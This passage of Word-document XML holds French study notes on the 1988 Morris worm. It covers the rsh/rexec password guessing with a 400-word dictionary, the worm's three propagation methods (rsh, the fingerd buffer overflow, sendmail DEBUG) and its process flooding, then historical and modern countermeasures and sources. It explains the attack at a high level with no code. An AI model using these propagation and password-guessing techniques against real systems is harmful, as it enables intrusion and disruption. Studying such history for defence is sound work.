    <w:p w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="4CE24459" w14:textId="77777777">
      <w:r w:rsidRPr="000E22A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Rsh/Rexec (connexions sans mot de passe)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="0F00ADB4" w14:textId="0933D3B4">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>Permettait la connexion sans ré-authentification</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="23A29C3D" w14:textId="48B6595E">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>Le vers force les mots de passe avec un dictionnaire de 400 mots</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="246B582E" w14:textId="385E205F">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>Essaye aussi</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>: username, emanresu, usernameusername</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="589D6C31" w14:textId="16E221B5">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>Correction</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>: désactiver sur réseaux non fiables, implémenter SSH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="2A4C86BE" w14:textId="56509EB5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Statut des vulnérabilités aujourd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hui</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>: Toutes résolues</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="54D9F2ED" w14:textId="00B4F640">
      <w:r w:rsidRPr="000E22A9">
        <w:t>Sendmail</w:t>
      </w:r>
      <w:r w:rsidR="00F5792E">
        <w:t> :</w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t xml:space="preserve"> Correctifs appliqués, mode DEBUG désactivé par défaut</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="48494803" w14:textId="3345E4EF">
      <w:r w:rsidRPr="000E22A9">
        <w:t>Finger</w:t>
      </w:r>
      <w:r w:rsidR="00F5792E">
        <w:t> :</w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t xml:space="preserve"> Service disparu d</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>Internet, ne s</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>utilise plus</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="3E5C73BB" w14:textId="41280440">
      <w:r w:rsidRPr="000E22A9">
        <w:t>Rsh/Rexec</w:t>
      </w:r>
      <w:r w:rsidR="00F5792E">
        <w:t> :</w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t xml:space="preserve"> Complètement remplacés par SSH (authentification forte + chiffrement)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="7BD0A233" w14:textId="76033CB3">
      <w:r w:rsidRPr="000E22A9">
        <w:t>Mots de passe</w:t>
      </w:r>
      <w:r w:rsidR="00F5792E">
        <w:t> :</w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t xml:space="preserve"> Fichier /etc/passwd privé depuis 1988, politiques fortes implémentées</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="0DEB737E" w14:textId="256726DD">
      <w:r w:rsidRPr="000E22A9">
        <w:t xml:space="preserve">MAIS </w:t>
      </w:r>
      <w:r w:rsidR="00F5792E">
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>es problèmes conceptuels demeurent</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>: débordements de buffer, services insécurisés par défaut, monoculture technologique</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="1CBA7115" w14:textId="7A8464DC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. Comment l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>attaque s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>est déroulée (méthode)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="3790F0F8" w14:textId="55A0E44F">
      <w:r w:rsidRPr="000E22A9">
        <w:t>Le vers utilisait 3 méthodes de propagation en cascade</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="4E7938BA" w14:textId="3BEC1ECC">
      <w:r w:rsidRPr="000E22A9">
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>Try_rsh</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>: Crée un processus enfant qui tente une exécution distante, reçoit le code du ver</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="1B822139" w14:textId="2D120110">
      <w:r w:rsidRPr="000E22A9">
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>Try_fingerd</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>: Si rsh échoue, exploite le débordement de buffer de finger pour obtenir un shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="6A413F87" w14:textId="1CADA997">
      <w:r w:rsidRPr="000E22A9">
        <w:t>3. Try_sendmail</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>: Si les 2 précédents échouent, envoie un email malformé à sendmail qui le compile et exécute</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="642F043E" w14:textId="61415A8E">
      <w:r w:rsidRPr="000E22A9">
        <w:t>Une fois à l</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>intérieur, le ver</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="7AC2B56E" w14:textId="25D4A6BF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:t>Se copie plusieurs fois (1 chance sur 7 de se réinfecter même si déjà présent)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="0720F02F" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:t>Crée des centaines de processus parasites</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="043654A0" w14:textId="49E2C5FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:t>Surcharge la mémoire et CPU jusqu</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>au crash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="33592BD5" w14:textId="757091B4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8. Comment empêcher l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>attaque</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="7EF35C92" w14:textId="77777777">
      <w:r w:rsidRPr="000E22A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mesures techniques immédiates (1988)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="59335735" w14:textId="1CC65130">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:t>Patcher sendmail (supprimer DEBUG)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="21A563FF" w14:textId="78346F97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:t>Patcher finger (vérifier les buffers)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="60F9FC03" w14:textId="7D5C0CB6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:t>Créer /usr/tmp/sh pour bloquer le vers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="7145D8C7" w14:textId="30A56FAA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:t>Désactiver rsh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="1F9A3465" w14:textId="77777777">
      <w:r w:rsidRPr="000E22A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mesures organisationnelles</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="79D8C1F5" w14:textId="68EBE400">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:t>Mots de passe forts (pas de dictionnaires simples)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="0B95C7D9" w14:textId="65A97700">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:t>Isoler les systèmes critiques d</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>Internet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="0C207C6B" w14:textId="5E79F437">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:t>Notification/alerte rapides entre administrateurs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="5551CB45" w14:textId="24D5849E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:t>Se déconnecter volontairement pour nettoyer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="3DEFEAF6" w14:textId="11CBAD31">
      <w:r w:rsidRPr="000E22A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Prévention moderne (applicable aujourd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hui)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="3815B17D" w14:textId="5B00033C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:t>Scanner les vulnérabilités régulièrement</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="3346E53F" w14:textId="49643733">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:t>Patcher automatiquement et rapidement</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="41D57DC0" w14:textId="152D7D87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:t>Segmenter le réseau, créer des zones démilitarisées</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="3645FCC0" w14:textId="17270047">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:t>Authentification multi-facteur (MFA)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="35FE2EF6" w14:textId="552C8EE5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:t>Diversifier les systèmes d</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="000E22A9">
        <w:t>exploitation (éviter la monoculture)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000E22A9" w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="735C6BB4" w14:textId="2DA1CD02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:t>Surveiller avec des IDS/SIEM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00F5792E" w:rsidR="00F5792E" w:rsidP="00F5792E" w:rsidRDefault="000E22A9" w14:paraId="3FC9A2B0" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:t>Systèmes de réponse aux incidents</w:t>
      </w:r>
      <w:r w:rsidRPr="00F5792E" w:rsidR="00F5792E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="fr-FR"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00F5792E" w:rsidR="00F5792E" w:rsidP="00F5792E" w:rsidRDefault="00F5792E" w14:paraId="1B012883" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00F5792E" w:rsidR="00F5792E" w:rsidP="00F5792E" w:rsidRDefault="00F5792E" w14:paraId="0752CC67" w14:textId="35731533">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F5792E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sources:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00F5792E" w:rsidR="00F5792E" w:rsidP="00F5792E" w:rsidRDefault="00F5792E" w14:paraId="0E783408" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:tgtFrame="_blank" w:tooltip="https://www.fbi.gov/history/famous-cases/morris-worm" w:history="1" r:id="rId8">
        <w:r w:rsidRPr="00F5792E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Morris Worm — FBI Famous Cases</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidRPr="00F5792E" w:rsidR="00F5792E" w:rsidP="00F5792E" w:rsidRDefault="00F5792E" w14:paraId="3470DB9E" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:tgtFrame="_blank" w:tooltip="https://www.fbi.gov/news/stories/morris-worm-30-years-since-first-major-attack-on-internet-110218" w:history="1" r:id="rId9">
        <w:r w:rsidRPr="00F5792E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>The Morris Worm — FBI 30th Anniversary</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidRPr="00F5792E" w:rsidR="00F5792E" w:rsidP="00F5792E" w:rsidRDefault="00F5792E" w14:paraId="68A60587" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:tgtFrame="_blank" w:tooltip="https://en.wikipedia.org/wiki/morris_worm" w:history="1" r:id="rId10">
        <w:r w:rsidRPr="00F5792E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Morris Worm — Wikipedia</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidRPr="00F5792E" w:rsidR="00F5792E" w:rsidP="00F5792E" w:rsidRDefault="00F5792E" w14:paraId="442EF0AC" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:tgtFrame="_blank" w:tooltip="https://en.wikipedia.org/wiki/robert_tappan_morris" w:history="1" r:id="rId11">
        <w:r w:rsidRPr="00F5792E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Robert Tappan Morris — Wikipedia</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidRPr="00F5792E" w:rsidR="00F5792E" w:rsidP="00F5792E" w:rsidRDefault="00F5792E" w14:paraId="57D3CE26" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:tgtFrame="_blank" w:tooltip="https://en.wikipedia.org/wiki/united_states_v._morris_(1991)" w:history="1" r:id="rId12">
        <w:r w:rsidRPr="00F5792E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>United States v. Morris (1991) — Wikipedia</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidRPr="00F5792E" w:rsidR="00F5792E" w:rsidP="00F5792E" w:rsidRDefault="00F5792E" w14:paraId="73987592" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:tgtFrame="_blank" w:tooltip="https://alumni.cornell.edu/cornellians/morris-worm/" w:history="1" r:id="rId13">
        <w:r w:rsidRPr="00F5792E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>The Morris Worm — Cornell Alumni</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidRPr="00F5792E" w:rsidR="00F5792E" w:rsidP="00F5792E" w:rsidRDefault="00F5792E" w14:paraId="3AE36637" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:tgtFrame="_blank" w:tooltip="https://www.rapid7.com/blog/post/2019/01/02/the-ghost-of-exploits-past-a-deep-dive-into-the-morris-worm/" w:history="1" r:id="rId14">
        <w:r w:rsidRPr="00F5792E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>The Ghost of Exploits Past — Rapid7</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidRPr="00F5792E" w:rsidR="00F5792E" w:rsidP="00F5792E" w:rsidRDefault="00F5792E" w14:paraId="40D50F57" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:tgtFrame="_blank" w:tooltip="https://www.sei.cmu.edu/history-of-innovation/fostering-growth-in-professional-cyber-incident-management/" w:history="1" r:id="rId15">
        <w:r w:rsidRPr="00F5792E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>CERT History — Carnegie Mellon SEI</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidRPr="00F5792E" w:rsidR="00F5792E" w:rsidP="00F5792E" w:rsidRDefault="00F5792E" w14:paraId="48BA61C2" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:tgtFrame="_blank" w:tooltip="https://www.cs.cmu.edu/afs/cs/academic/class/15213-s02/www/applications/recitation/recitation4/a/r04-a-4up.pdf" w:history="1" r:id="rId16">
        <w:r w:rsidRPr="00F5792E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Morris Worm fingerd attack — CMU</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
